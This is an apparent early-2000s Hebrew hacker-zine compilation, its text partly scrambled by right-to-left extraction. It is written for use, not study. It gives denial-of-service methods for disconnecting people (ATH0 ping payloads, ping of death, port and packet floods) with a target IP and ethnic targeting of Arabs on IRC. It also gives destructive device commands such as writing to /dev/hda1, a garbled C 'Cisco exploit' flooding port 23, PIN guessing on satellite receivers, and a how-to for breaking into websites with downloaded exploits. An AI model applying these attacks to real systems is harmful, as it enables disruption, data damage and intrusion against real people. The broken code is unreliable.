ספר הידע הגדול של האקר-זון

‫ספר הידע הגדול של האקר‪-‬זון‬
‫זהו ספר של האקר זון‪ -‬אני רק מביא לכם אותו לקריאה ולמידה‬
‫בלבד!‬
‫כאן ב"ספר" הזה אנחנו נאסוף את מיטב הטקסטים והמדריכים‬
‫שכתבנו נכון ל‪ -15/7/2002.‬אנחנו מקווים שתהנו והכי חשוב‬
‫שתלמדו! אנא בקרו אותנו באתרנו לטקסטים חדשים יותר‬
‫ונוספים‪ ,‬תוכנות האקינג רבות‪ ,‬עמוד לינוקס מפורט ומעודכן‬
‫הכולל אקספלוייטים ודרכי שימושם‪ ,‬פורום נהדר עם קהילה‬
‫נהדרת‪ ,‬ואף תוכלו לפרסם את הטקסטים שלכם ללא דאגה בלי‬
‫בעיה באופן אוטומטי!‬
‫כדי לקבל את כל הדברים הללו כל שעליכם לעשות הוא להכנס‬
‫לאתרנו בכתובת הבאה‪:‬‬
‫נושא‪ :‬האקינג‬
‫פה אנחנו נראה את המדריכים אשר נוגעים לנושא האקינג‪,‬‬
‫פריצה לאתרים‪ ,‬למחשבים‪ ,‬וכו' וכו'!‬
‫כמה שיטות לנתק אנשים מהאינטרנט‬

‫טקסט נחמד שנכתב מתוך שעמום תחת השפעה של שוקולד‪:‬‬
‫איך לנתק אנשים מהאינטרנט‬
‫‪----------------------------------------------------‬‬
‫)לא להתיחס להערות‪ :‬מעליבות‪,‬מוזרות‪,‬וכו‪(...‬‬
‫למה ?‬ ‫‪(1‬‬
‫ראשונה‪ath0 :‬‬ ‫שיטה‬ ‫‪(2‬‬
‫שנייה‪lame) ping o death) :‬‬ ‫שיטה‬ ‫‪(3‬‬
‫שלישית‪port flood :‬‬ ‫שיטה‬ ‫‪(4‬‬
‫רביעית‪(paqwetting" (packetting" :‬‬ ‫שיטה‬ ‫‪(5‬‬
‫‪----------------------------------------------------‬‬
‫‪ (1‬למה ?‬
‫‪---------‬‬
‫למה לעשות את זה ?‬
‫‪...‬ככה‪...‬אולי משעמם לכם לפעמים אז תעבירות את הזמן‬
‫בלהכנס לשרתי \ ערוצי מירק של ערבים ומתוך שעמום תתחילו‬
‫לנתק ערבים‪...‬‬
‫דוגרי אין לי ממש סיבה‬
‫‪----------------------------------------------------‬‬
‫‪ATH0 (2‬‬
‫‪--------‬‬
‫חיזבאללה !!! איפה איפה ?!‬
‫המממ‪....‬הסברתי לכם באיזה טקסט שלי איך לנתק עם זה‬
‫אנשים אז פה אני רק יזכיר לכם‪:‬‬
‫בלינוקס אתם עושים‪:‬‬

‫‪ping -c 5 -p 2b2b2b41544830 IP‬‬
‫שזה בעצם שולח את ‪ ATH0+++‬שאומר למודם להכנס‬
‫למצב פקודות ואז מריץ את הפקודה ‪ATH0‬‬
‫)אתה ה ‪ ip‬תחליפו באי פי(‬
‫בווינדוס‪:‬‬
‫צריך להוריד \ להכין תוכנה ‪ ...‬אפשר למצוא ‪ 2‬כאלה‬
‫ב‪:‬‬
‫‪neworder.box.sk‬‬
‫פשוט תריצו שם חיפוש על‬
‫‪ATH0‬‬
‫ומשם תבינו לבד או שתקראו את אטקסט שלי‬
‫‪----------------------------------------------------‬‬
‫‪the lame ping o death (3‬‬

‫‪------------------------‬‬
‫יש שתי דרכים לבצע את זה‪:‬‬
‫‪(1‬להריץ כמה של חלונות של פינג שעושים עם הפקודה‪:‬‬
‫‪t -l 65500 ip- 212.179.173.64‬‬
‫אחרי כמה דקות הוא יהיה מנותק ‪ ...‬מה שחרא זה הזמן שזה לוקח‬
‫שיטה שנייה‪:‬‬
‫לעשות משהו כזה‪:‬‬
‫‪ping -t -l 99999 212.179.173.64‬‬
‫מה שהווינדוס לא יתן לכם לעשות בגלל זה צריך גרסה פרוצה של הפינגר‬
‫עם הצלחתם לבצע את זה ועבר טוב ‪ ...‬הקורבן יושב מול מסך כחול‬
‫כי הווינדוס מוגבל כמו ילד מפגר‬
‫‪-----------------------------------------------------‬‬
‫‪port flooding (4‬‬

‫‪-----------------‬‬
‫יש כל מיני סוגים של זה אבל אני יתמקד ב ‪ 2‬מהם‬
‫ראשונה‪ :‬להתחבר לפורטים להמון פורטים ראנדומאלים ב ‪ tcp‬או ב‬

‫‪ udp‬זה יגרום לעומס על המערכת ולבסוף יגרום לו ליפול‬
‫שנייה‪ :‬להתחבר המון פעמים לאותו פורט זה יגרום לפורטים‬

‫האחרים להתעלם מבקשות אחרות כי לא יהיה המערכת לא תוכל‬
‫להפעיל מספיק סוקטים‪ ,‬את שתי הדרכים האלה מומלץ לעשות‬
‫ממערכת הפעלה‪ win2k :‬או ‪ winxp‬כי הם יכולים לפתוח המון סוקטים‬
‫הנה קוד קטן שאני משתמש בו קצת והוא עובד די נחמד‪:‬‬
‫בעעע הרגע גיליתי שהתקייה של הפרל שלי ‪ ...‬נהרסה‬

‫בכל מקרה חפשו בגוגל‪:‬‬
‫‪udp.pl packetstorm‬‬
‫וזה ימצא את זה‬
‫אפשר גם להשתמש בתוכנה הישנה‪:‬‬
‫‪port fucker‬‬
‫שיתחבר מלא פעמים לפורט אחד‪ ,‬רק תגדירו שהוא יתחבר עם יקבל ניתוק ושה‬
‫‪ DEaly‬שלו יהיה ‪1ms‬‬
‫‪-----------------------------------------------------‬‬
‫‪packetting (5‬‬
‫‪--------------‬‬
‫לפקט‪....‬הממממ‪...‬אני רק ימצא דוגמא‪...‬שנייה‪...‬‬
‫אוקי‬
‫מה שהשיטה הזאת עושה זה שולחת המוווון פאקטים שכרגיל‬
‫גורמים לעומס על מערכת השליחה והקבלה מה שגורם לניתוק‬
‫הנה לוג קטן מהמירק‪:‬‬
‫‪-‬‬
‫]^‪jaxler PING reply]: 2secs‬‬
‫‪-‬‬
‫]^‪jaxler PING reply]: 12secs‬‬
‫‪-‬‬
‫‪!PING? PONG‬‬
‫‪-‬‬
‫]^‪jaxler PING reply]: 1min 8secs‬‬
‫‪-‬‬
‫]^‪jaxler PING reply]: 1min 45secs‬‬
‫‪-‬‬
‫‪1min 45secs‬‬
‫זה הכי גבוהה שהגעתי‪...‬כי פסקתי‪ ,‬אבל קיצר מה שקורה‬
‫זה שזה חוסם את כל הכניסות והיציאות של האינטרנט וכדי להשתמש‬
‫בשיטה הזאת מומלץ בחום אינטרנט מהיר ! בעיקר בהעלה‬
‫עם הייתי ממשיך והייתי מגיע למאה שמונים שנייות הוא‬
‫היה מתנתק מהאינטרנט כי ה ‪ isp‬היה חושב שהוא לא שם יותר כי הוא לא מגיב‬
‫ובמירק היה רשום משהו כמו‪:‬‬
‫^‪(jaxler quit (ping timeout 180 secs‬‬
‫בערך‪...‬‬
‫‪----------------------------------------------------‬‬
‫טוב אני כבר לא משועמם כי אני זז מפה‬

‫‪C ya‬‬
‫‪spy[D]ir‬‬
‫אקספלוייטים בחומרה‬
‫אקספלויטים בחומרה‪....‬‬
‫‪---------------------‬‬
‫‪ (1‬מדפסות‬
‫‪ (2‬מודמים‬
‫‪YES (3‬‬
‫‪ (4‬קראק זמן של הכל‬
‫‪--------------------‬‬
‫‪ (1‬מדפסות‬
‫‪-----------‬‬
‫יש מדפסות בעיקר של ‪ hp‬שפותחות פורט שאם אתה מתחבר אילו אז אתה יכול‬
‫להשתמש בו‬
‫להדפיס לקבוע סיסמא וכל מיני בולשיט ‪ ...‬זה פורט ‪ 500‬אני חושב‬
‫אבל יש עוד כמה נחמדים‪...‬כמו להוסיף ל ‪ autoexec.bat‬שלכם את השורה‬
‫בהתחלה‪:‬‬
‫‪echo $#%#^%&#$%#$%^# >> LPT1‬‬
‫אתה ה ‪ 1‬אפשר לשנות ‪ ...‬זה ידפוק לכם את המדפסת כך שהווינדוס לא יזהה‬
‫מה זה‬
‫ואפשר גם להכנס למירק תחת השם הזה ועם מישהו עושה לך איגנור הוא או‬
‫יקרוס או‬
‫שהמדפסת לא תגיב עד הריסט הבה של שניהם‬
‫בלינוקס תעשו ‪ echo hi >> /dev/lpt1‬וזה יגרום לאותו דבר‬
‫‪ (2‬מודמים‬
‫‪-----------‬‬
‫לכלום הסברתי את הבאג של ה ‪ ATH0+++‬נכון ?!‬
‫אז יש את זה וגם אפשר גם להוסיף משהו כזה ל ‪autoexec.bat‬‬
‫‪ECHO GFHGFH >> com1‬‬
‫את האחד גם פה אפשר לשנות‪,‬‬
‫רוב הבאגים אותו דבר יש המון אפשרויות‪ ...‬וגם את זה אפשר לעשות במירק‬
‫)ד"א(‬
‫ובלינוק נחמד לעשות‬
‫‪echo HI >> /dev/hda1‬‬
‫שזה ידפוק את ההארד דיסק ‪ ...‬מניסיון אישיויש המון מכשירים שמוגדרים‬
‫בדוס שאם תכתבו אותם זה יגרום למסך כחול הנה רשימה קצרה‪:‬‬
‫‪con/con‬‬
‫‪nul/nul‬‬
‫‪$clock$/clock‬‬
‫‪$config$/config‬‬
‫‪aux/aux‬‬
‫ועוד‪...‬‬
‫‪YES (3‬‬
‫‪-----------‬‬
‫רוצים בלה בלה בלה ?‬
‫‪!YES‬‬
‫רוצים עוד בלה בלה בלה ?‬
‫‪!YES‬‬
‫רוצים להאזין לתדרים דרך הלוין שלנו ?‬
‫‪!YES YES YES‬‬
‫‪...‬‬
‫זה משהו שאני מצאתי ובדקתי לפני שבועיים ואני מקווה שלא עלו על זה‬
‫תלחצו על הסמל של המעטפה בקצה למטה של השלט )נראה כמו סמל של אי מייל(‬
‫יעלה לכם קצת חרא ‪ ...‬תלכו עם החצים של ימינה ושמאלה‬
‫ל‪-‬לווין ושם תלחצו על בחירת לווין ‪ ...‬זה יבקש סיסמא ועם ההורים שלך לא‬
‫שינו קוד‬
‫אז זה ‪ 0000‬עם הם שינו תנסה את שנות הלידה של ההורים שלך ועם זה לא עובד‬
‫תנסה מה שחבר שלי ניסה‬
‫תעברו על הכל‪ ..‬אחרי שעברתם על מה שהגיוני‪ ....‬הוא התיאש ב ‪ 4670‬בערך‬
‫או קי עכשיו אתם רואים רשימה של לווינים נחמדים וחלקם באיכות יותר טובה‬
‫מהדיפולט‬
‫תחפשו שם‪:‬‬
‫‪user1‬‬
‫או‬
‫‪user2‬‬
‫‪user3‬‬
‫‪user4‬‬
‫)כולם אחד אחרי השני(‬
‫אחרי שמצאתם תלחצו על הסימן של ה ‪ +‬בשלט )תוודאו שאתם מסמנים את זה(‬

‫עכשיו אתם רק צריכים להכניס תדר ב‬
‫‪ Mhz‬שיש באינטרנט רשימות של כאלה )ד"א זה יעבוד רק על תדרים בישראל אני‬
‫חושב(‬
‫עכשיו יש מלא חרא עם אתם מבינים בזה תסדרו את זה עם לא אז תמשיכו ללחוץ‬
‫על הכפתור של ה ‪YES‬‬
‫עוד ד"א‪ :‬אל תנסו להכניס תדרים של הממשלה וגם לא של לווינים של ‪ nasa‬כי‬
‫יאתרו אותכם‬
‫ו‪....‬זהו‪...‬עוד עוד ד"א‪ :‬אפשר גם להאזין לרדיו עם זה וגם לראות טלויזיה‬
‫אבל עם מישהו ידבר )למשל אתם מאזינים לפלאפון(‬
‫אז זה יפסיק וישמעו רק קול‪,‬‬
‫‪-----------------------------------------------------------------‬‬
‫אני לא ממליץ לאף אחד בלה בלה בלה וכו כל הזכויות בלה בלה בלה‪...‬‬
‫‪spy[D]ir (c) ! dont bla bla bla‬‬
‫לא באחריותי כמובן מה שיקרה מתוצא בשימוש טקסט זה‪.‬‬
‫זה רק טקסט על ‪ ...‬הממממ‪......‬איך לשפר איכות ב‬
‫‪YES‬‬
‫)שיהיה(‬
‫‪-----------------------------------------------------------------‬‬
‫‪time crack for all (4‬‬

‫‪---------------------‬‬
‫זה דבר נחמד אני לא קראתי על זה טקסט אבל אני משער שהמון חשבו על זה וזה‬
‫בדוק‬
‫עובד !‬
‫תפתחו את המחשב ותחפשו סוללה קטנה בערך בגודל של חצי שקל‬
‫‪...‬‬
‫תוציאו אותו )הוא איפהשהו על המעבד או לוח אם(‬
‫ותדליקו את המחשב‪ ,‬רוב הסיכוים שיהיה לכם אררור כל פעם שתדליקו אבל למי‬
‫אכפת זה‬
‫שווה את זה‪..‬‬
‫עם זה מבקש ללחוץ על ‪ f12‬או משהו כדי להכנס לסטאפ אז תלחצו ואז צאו מזה‬
‫עם ‪) Esc‬כן זה הביוס שלכם(‬
‫וזה עובד על ‪ % 99.9‬מהתוכנות‬
‫ואפשר גם לעשות‬
‫‪echo 666 >> clock$ a‬‬
‫בלי ה ‪ a‬בסוף‪...‬‬
‫וזה ידפוק את השעון של הסיסטם אבל זה ממש לא מומלץ‬
‫יאללה אני חייב לזוז‬

‫‪c ya‬‬
‫‪spy[D]ir.‬‬
‫=====================================================================‬
‫========‬
‫‪hackerz-zone.com‬‬
‫=====================================================================‬
‫========‬
‫)‪(C‬‬
‫יש לי המון ד"א‪...‬‬
‫ד"א‪:‬‬
‫מי שיודע טוב לתכנת ב‪-‬‬
‫‪Php, java ,VBS, Asp‬‬ ‫‪, cgi‬‬
‫או כל שפת אינטרנט חוץ מ ‪html -‬‬

‫שיצור קשר ב ‪:icq‬‬
‫‪110944750‬‬
‫ושם כבר נדבר‬
‫‪---------------------------------------------------------------------‬‬
‫‪--------‬‬
‫‪---------------------------------------------------------------------‬‬
‫‪--------‬‬
‫)‪(spy[D]ir‬‬
‫‪Denial of service‬‬
‫=‪-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-‬‬
‫‪DoS‬‬
‫=‪-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-‬‬
‫כאן אני הולך להסביר קצת חרא על ‪DoS‬‬
‫‪(1‬מה זה?‬
‫‪(2‬סוגים‬
‫‪ping(3‬‬
‫‪icmp(4‬‬
‫‪igmp(5‬‬
‫‪(6‬ראוטרים‬
‫‪(7‬פורטים‬
‫‪(8‬פיירואלל‬
‫‪(9‬חומרה‬
‫‪(10‬מירק‬
‫‪(11‬טיפ‬
‫========================================================‬
‫‪ (1‬מה זה ?‬
‫‪----------‬‬
‫‪ DoS‬זה קיצור של דינאיל אוף סרוויס יענו שגיאה בשירות‬
‫יש כל מיני סוגים שלהם אבל רובם \ כולם גורמים לאותו הדבר‬
‫‪...‬לקריסה של השירות או מערכת כדי שהמערכת לא תיהיה פעילה או‬
‫שחלק ממנה לא יפעל טוב או שהיא תתחיל את עצמה מחדש ובגלל זה‬
‫יחזרו למערכת כל הסיסמאות של הדיפולט‬
‫=========================================================‬
‫‪ (2‬סוגים‬
‫‪---------‬‬
‫יש כל מיני סוגים‪ ,‬אבל אלה הם הפגיעים ביותר‪:‬‬
‫חומרה ותוכנה‪.‬‬
‫כי הם פותחים פורטים ‪ ,‬ורובם שייכים למיקרוסופט‬
‫וחלק נמצאים במערכת הפעלה ואי אפשר להוריד אותם אבל אפשר לתקן‬
‫את הבאגים האלה‬
‫=========================================================‬
‫‪Ping (3‬‬
‫‪--------‬‬
‫יש שלוש בעיות בפינג ‪ ,‬אחד זה שרוב הפיירואללים לא מתיחסים אליהם‬
‫כי כל דבר באינטרנט מחזיר לך פינג או עושה לך פינג למשל‪:‬‬
‫שאתה נכנס לאתר הדפדפן שלך עושה לו פינג כדי לבדוק עם הוא קיים‬
‫ועוד כל מיני פרטים שוליים‪,‬‬
‫בעיה שנייה זה שעם עושים לך יותר מדי פינגים )שזה בהחלט ליים(‬
‫למשל למשך חמש דקות אז זה עלול לגרום למחשב שלך לקרוס או שזה‬
‫ינתק אותך מהאינטרנט כי המודם שלך מתאמץ אבל זה רק עם יש לך‬
‫‪ K 56‬או פחות )חח( ולמי שעושה לך את זה יש משהו מהיר יותר כמו‬
‫‪ adsl‬או עדיף ‪ isdn‬כי ‪ isdn‬מעלה יותר מהר מה אי די אס אל )‪ 128‬בערך(‬
‫הבעיה השלישית היא שהוינדוס תוכנת לקבל מקסימום ‪ 65500‬וזה לא נותן לך‬
‫לשלוח יותר‬
‫כדי שלא תעשה את זה לאנשים אחרים ב ‪ 98‬עשו אותו דבר אבל זה לא יכול לקבל‬
‫‪ 65510‬ביתים של פינג‪ ,‬אז כדי לנצל את זה צריך לכתוב את זה בפרל או בסיי‬
‫או בכל שפה אחרת‬
‫ד"א מה שתצליח לשלוח עם הפינג הרגיל זה ‪ 65500‬וזה לא עוזר אלא עם יש לכם‬
‫חמש דקות פניות‬
‫)למרות שבזמן הזה הקורבן כבר ילך לישון יתנתק לבד(‬
‫עוד ד"א ‪ -‬עם מחשב אחר מקבל ‪ 65510‬הוא יקרוס ובמקרה של ווין ‪ 98‬או ‪95‬‬
‫הוא יעלה מסך כחול ומכוער‬
‫=========================================================‬
‫‪ICMP (4‬‬
‫‪--------‬‬
‫זה כמו פינג‪ ,‬זה בעצם הפרוטוקול שמשמש פינג‬
‫=========================================================‬
‫‪IGMP (5‬‬
‫‪--------‬‬
‫זה גם כמו פינג רק שאי אפשר לשלוח אותו בגודל גדול מידי אפשר רק לנסות‬
‫להציף‬
‫אותו‪ ,‬ורוב המחשבים מוגנים מזה ‪ ...‬בערך ‪ 99‬אחוז מוגנים ‪ ...‬אולי‬
‫‪ windows 95‬לא מוגן אבל זהו‬
‫=========================================================‬
‫‪ (6‬רואטרים‬
‫‪-----------‬‬
‫יש המון סוגים של ראוטרים אבל אני יתמקד ב ראוטרים של‬
‫ כי זה הראוטר הכי נפוץ ובגלל זה יש לו המון באגים‬CISCO
(‫)כי אנשים בודקים אותו כל הזמן‬
‫אני יתן פה אקספלויט בסיי על אחד הבאגים הנפוצים שלו שגורמים לו לעשות‬
:‫ הסיסמאת דיפולט שלו היא‬...‫ ומחזיר את הסיסמא שלו לדיפולט‬RESET
‫או‬
CISCO
‫באותיות גדולות‬
‫או‬
Cisco
‫שזה רק האות הראשונה או‬
cisco
..‫שזה הכל קטן‬
:‫הנה האקספלויט‬
<include <stdio.h#
<include <string.h#
<include <netdb.h#
<include <netinet/in.h#
<include <sys/types.h#
<include <sys/socket.h#
<include <unistd.h#
/* define dport 23 /* The port we want#
;int x, s, i, p
char *str =
"45646545646465465465fsdfdsfdsfdsf46465454665465465456456465465456465
465465456464654654564564564564564564654654564654654654564654464656464
654456654unFunF454646465465465465465456456465456465456456465456456321
313132132123132123123132123132123132132132123132123123154654645646464
;"464
;struct sockaddr_in addr, spoofedaddr
;struct hostent *host
} (int open_sock(int sock, char *server, int port

;struct sockaddr_in blah
;struct hostent *he
;((bzero((char *)&blah,sizeof(blah
;blah.sin_family=AF_INET
;(blah.sin_addr.s_addr=inet_addr(server
;(blah.sin_port=htons(port
} (if ((he = gethostbyname(server)) != NULL

;(bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length
{
} else
} (if ((blah.sin_addr.s_addr = inet_addr(server)) < 0
;("()perror("gethostbyname
;(return(-3
} (if (connect(sock,(struct sockaddr *)&blah,16)==-1

;("()perror("connect
;(close(sock
;(return(-4
([]void main(int argc, char *argv

;int t
} (if (argc != 3
‫‪;("printf("Cisco Xploit\n\n‬‬
‫>‪printf("Usage: %s <target> <port> <incase they try to hide it‬‬
‫‪;([\n",argv[0‬‬
‫‪;(exit(0‬‬
‫{‬
‫‪(++for (t=0; t<5; t‬‬
‫}‬
‫‪} (if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1‬‬
‫‪;("()perror("socket‬‬
‫‪;(exit(-1‬‬
‫‪;([p = atoi(argv[2‬‬
‫‪;(open_sock(s,argv[1],p‬‬
‫‪} (++for (i=0; i<10; i‬‬

‫‪;(send(s,str,strlen(str),0x0‬‬
‫{‬
‫‪;("printf("spy[D]ir\n‬‬
‫{‬
‫‪;(close(s‬‬
‫{‬
‫הפורט שאתם צריכים זה כמובן ‪23‬‬
‫=========================================================‬
‫‪ (7‬פורטים‬
‫‪----------‬‬
‫מה שטוב בפורטים זה שהם חייבים להיות וכולם ניתנים לניצול‬
‫יש פורטים שקורסים אם הם מקבלים המון בולשיט או שהם מקבלים המון‬
‫פקודות ואז הם קורסים ויש גם את הבעיה שאם מתחברים אליהם יותר מידי‬
‫סוקטים הם או קורסים או שפשוט אף אחד לא יכול להתחבר אליהם וזה יכול‬
‫לגרום להמון בעיות‬
‫למשל אם מתקיפים את הפורט ‪ 139‬אז המשתמשים ברשת שלך לא יכולים לגשת לך‬
‫לקבצים ששיתפת‬
‫או שעם מתחברים ליותר מידים פורטים ראנדומלים )זה לא משנה עם זה ‪ tcp‬או‬
‫‪(udp‬‬
‫הם לא יתנו לקורבן לעשות כלום באינטרנט אפילו לא לגלוש ולא לקבל פינגים‬
‫מה‬
‫‪ isp‬שלהם מה שיגרום לזה שהם יתנתקו )‪ = isp‬ספק אינטרנט( ‪ ,‬יש לי‬
‫אקספלויט בשביל זה ב‬
‫‪ perl‬יענו ‪ pl.‬עם אתם רוצים אותו צרו קשר באי סי קיו שלי ואני יתן לכם‬
‫את הקוד‬
‫אבל מומלץ להשתמש בזה ממערכת הפעלה של ‪ xp‬או ‪windowz 2000‬‬
‫כי הם יכולים לפתוח המון סוקטים ‪ ...‬אפילו יותר מלינקס וכדי להריץ את זה‬
‫תצתרכו להוריד‬
‫‪ - Active Perl‬חפשו בגוגל‪...‬‬
‫=====================================================================‬
‫================‬
‫‪Firewalls(8‬‬
‫‪------------‬‬
‫כדי לרסק פיירואלל אתם צריכים להתחבר להמון פורטים כמה שיותר מהר‬
‫וזה גם יהיה טוב עם תשתמשו בתוכנה שתעשה ספוף לאי פי שלך ככה שלא‬
‫לחסום את האי פי שלך וזה לא יחשוב עליך אפילו‪ ,‬מה שיקרה זה שזה יקפוץ או‬
‫יעשה רעש או‬
‫יגיד לקורבן שמנסים להתחבר לפורט המסוים וישאל אותו עם לחסום וכו‪...‬‬
‫אבל עם זה יקרה מהר מדי על פורטים שונים זה יודיע על חיבורים מלאאאא‬
‫פעמים וזה יתקע את המחשב‬
‫והקורבן יאלץ לסגור את הפיירואלל‪ ,‬וזה גם ימלא מקום בהארד דיסק בגלל‬
‫הלוג )זאת שיטה בדוקה(‬
‫תחשבו לבד איך לנצל את זה או שעוד פעם תפנו אליי ותקחו ממני את התוכנה‬
‫שלי שהכנתי לזה‬
‫=====================================================================‬
‫================‬
‫‪ (9‬חומרה‬
‫‪---------‬‬
‫בחלק הזה של הטקסט שלי אני יתמקד במדפסות של ‪HP‬‬
‫הם פותחים פורט תחת המספר ‪ 500‬ואפשר לגרום לו להדפיס מלא בולשיט עם‬
‫הפקודה‬
‫‪ print‬או משהו כזה‪ ,‬הדבר הנחמד בזה זה שאפשר להציף את הפורט הזה בדאטא‬
‫הזה למשל‪:‬‬
‫‪ print c:\autoexec.bat‬ואז גם הוא יפחד וגם יגמר לו הדיו ‪ ...‬ואולי עם‬
‫זה יהיה מספיק מהר‬
‫ידפק לו המדפסת וגם נחמד לעשות לו‪:‬‬
‫‪print /con/con.txt‬‬
‫שיגרום לו למסך כחול )עם זה ‪ 98‬או ‪))) 95‬הווינדוס(((( (‬
‫יש המון דברים אחרים כמווווו הממממ‪....‬לא עולה לי בראש אבל אני משער שיש‬
‫לכם רעיונות‬
‫=====================================================================‬
‫=================‬
‫‪ (10‬מירק‬
‫במירק אפשר לשלוח ‪ ctcp‬עם תוכן אז אפשר לשלוח ‪ ctcp‬שמלא ב " " )רווחים(‬
‫וזה יגרום ללאג לקורבן‪)....‬סתם קצר ונחמד(‬
‫וגם אפשר לשים את השם שלך תחת ‪com1 :‬‬
‫או ‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫ועם עושים לך איגנור אז הם גם עושים לחומרה שלהם למשל המודם‬
‫שנמצא בקום הזה‬
‫=====================================================================‬
‫=================‬
‫‪ (11‬טיפ‬
‫‪--------‬‬
‫יש משחקי טלוויזיה כמו הוגו הישן שמתפקדים לפי החצים שלך‬
‫יענו לפי הצלילים אז תנסו להקליט מלאאא צלילים כמו ‪ 6‬ו ‪4‬‬
‫יענו לזוז לצדדים ועם אתם מצליחים לעלות למשחק כזה תשמיעו אותם‬
‫וזה אמור לתקוע את זה )זה לא בדוק(‬
‫=====================================================================‬
‫==================‬
‫זהו ‪ ...‬מתחיל להמאס לי לכתוב ‪ ....‬האי סי קיו שלי הוא‬

‫‪110944750‬‬
‫אל תגנבו את הטקסט הזה‬
‫כל הזכויות שמורת לי ואני אפילו לא העתקתי וגם לא תרגמתי שום טקסט אחר‬
‫בשביל לכתוב את זה‬
‫בגלל זה כנראה כואב לי כבר היד‪....‬‬
‫‪.spy[D]ir‬‬
‫‪p.s viset us @ www.hackerz-zone.co.il‬‬
‫=====================================================================‬
‫===================‬
‫‪by reading this text it meens your 0wned by spy[D]ir.....and im not‬‬
‫אחרי על מה שיקרה וכו‪...‬‬
‫פריצה לאתר‬
‫******************************************אקספלויט*******************‬
‫****************)‪(C‬‬
‫)‪(second edition)(part 1 from 3‬‬
‫‪!!!!!!!!!!!!Break into site, The Script kiddie Way by MiDL‬‬
‫‬ ‫"‪"the young boy learns their rules‬‬
‫**********************************************************‬
‫‪#OpleMidl‬‬ ‫לא הבנתם משהו‪,‬לא הצליח לכם‪,‬רוצים לדבר איתי‪ ,‬כנסו לערוץ‬
‫במירק בשרת של ‪dalnet‬‬
‫‪!!!!!!!your all invite‬‬
‫*********************************************************************‬
‫****************‬
‫טוב יכול להיות שאני יטעה אז אם תשימו לב למשהו תרגישו חופשיים לצור‬
‫איתי‬
‫קשר כנסו‬
‫לערוץ שלי בדלנט אני נימצא שם הרבה ביחוד בין ‪ 9‬ל ‪11‬‬
‫בלילה‪!......................‬‬
‫*********************************************************************‬
‫****************‬
‫טוב לפי איך שאני הבנתי אקספלויט זה דבר שרץ על השרת ופורץ אותו!!!‬
‫*‬
‫אבל איך מריצים אותו? מה זה שאלל? איפה מוצאים אחד כזה?‬
‫*‬
‫על זה אני עומד לענות לכם טוב יש כמה שלבים בפריצת אתרים ע"י‬
‫אקספלויט!!!‬
‫*‬
‫שלב‬
‫‪-------------------------------------------------------------------:1‬‬
‫‪-----------‬‬
‫להשיג פרטים על האתר שאנחנו רוצים לפרוץ כמו על איזה מערכת הוא רץ‬
‫מיספר‬
‫אי פי‬
‫רוחב הפס וכו וכו‪ ,,,,‬אבל הכי חשוב זה לדעת איזה מערכת יש לו‪.‬‬
‫איך אנחנו עושים זאת?‬
‫יש הרבה שיטות כמו לקבל את ההודעות שגיאה מהאתר אבל השיטה הכי טובה זה‬
‫להיכנס לאתר‬
‫שמציע לבדוק את זה בשיבלך הנה אתר מצויין שעושה זאת‪.‬‬
‫‪www.netcraft.com‬‬
‫אז שמה תשים את האתר במנוע שלהם והוא יעשה לכם את העבודה‪.‬‬
‫*********************************************************************‬
‫*****************‬
‫שלב‬
‫‪-------------------------------------------------------------------:2‬‬
‫‪------------‬‬
‫אחרי שאתם יודעים איזה מערכת יש על השרת מה שאתם צריכים לעשות זה ללכת‬
‫לאתרים כמו‪:‬‬
‫‪www.astalavista.box.sk‬‬
‫‪http://hack.co.za‬‬
‫‪www.securityfocus.com‬‬
‫‪www.packetstormsecurity.org‬‬
‫ולהוריד משם את האקספלויט המתאים למערכת‪ ,‬עכשיו אני יעצור רגע ויסביר מה‬
‫זה אקספלויט‪):‬כן קצת אנגלית אף פעם לא הזיקה זה הסבר מצוין תעשו כמובן‬
‫עכשיו קונטרל‪+‬שיפט לקריאה נכונה(‬
‫*********************************************************************‬
‫*********************************************************************‬
‫*********************************************************************‬
‫*************************************************‬
‫‪A exploit is a bug in a software, hardware, and/or OS that allows‬‬
‫‪attacks to get access there not supposed to, like root on a machine,‬‬
‫‪or just‬‬
‫‪.shell access‬‬
‫‪An exploit is a downloadable program (that usually has to be‬‬
‫‪,compiled‬‬
‫‪more on this in a bit), that takes advantage of the vunerablity‬‬
‫‪usually‬‬
‫‪giveing access to the computer or even worst, root (unless it's a‬‬
‫‪.(windows server then I guess it would be admin‬‬
‫‪.There are three types of exploits, local, remote, and DDOS‬‬
‫‪!!!Anyway‬‬
‫אקספלויט יבוא ברוב המיקרים כקוד מקור )לא מחייב( אז לפני שאנחנו מריצים‬
‫אותם אנחנו צריכים לקמפיל אותם )אני יסביר יותר מאוחר איך עושים זאת(‬
‫כמעט כול האקספלויטים ירוצו תחת מערכת של יוניקס או לינוקס‪.‬‬
‫ז"א שאנחנו צריכים ליפתוח חשבון שאלל בשביל שנוכל להריץ אקספלויטים‪.‬‬
‫)אפשר‬
‫גם דרך קימפול רגיל עים כול מהדר של סי או פרל(‬
‫הסבר למי שלא יודע מה זה חשבון שאלל עים אתם יודעים תעברו הלאה אני‬
‫ממליץ‬
‫לקרוא‪:‬‬
‫*********************************************************************‬
‫*********************************************************************‬
‫*************************************************‬
‫)את ההסבר הבא בחלקו לקחתי מבלוד ראנר מנהלת גהנום אחלה של אתר(‬
‫בעיקרון ‪) shell account‬או "שאלל" בעברית המעוותת של ימינו(‬
‫היא דימוי של מערכת יוניקס‪,‬כלומר אתה יכול להריץ פקודות של יוניקס‬
‫ומכיון‬
‫שרוב האקספלויטים פועלים תחת מערכת זאת‬
‫אנחנו צריכים ליפתוח לנו חשבון )תאמינו לי קשה למצוא אתרים שיתנו לך אבל‬
‫אני מצאתי( ‪(:‬‬
‫‪www.hobbiton.org‬‬
‫‪www.arbornet.org‬‬
‫אני פתחתי באתר השני חשבון‪.‬‬

‫כמובן שאנחנו מיתחברים אל החשבון שלנו בעזרת טלנט‪ ,‬איך אנחנו עושים‬
‫זאת?)קונטרול שיפט לקריאה נכונה(‬
‫‪ <telnet <host/ip> <port‬לדוגמא נגיד שאני רוצה‬ ‫דרך דוס תירשמו‬
‫להיתחבר‬
‫לחשבון שלי באתר הראשון ברשימה אני ירשום כך‬
‫*‪/‬גם דרך הוינדוס לכו להתחל הפעל‪*/‬‬ ‫‪telnet hobbiton.org 23‬‬
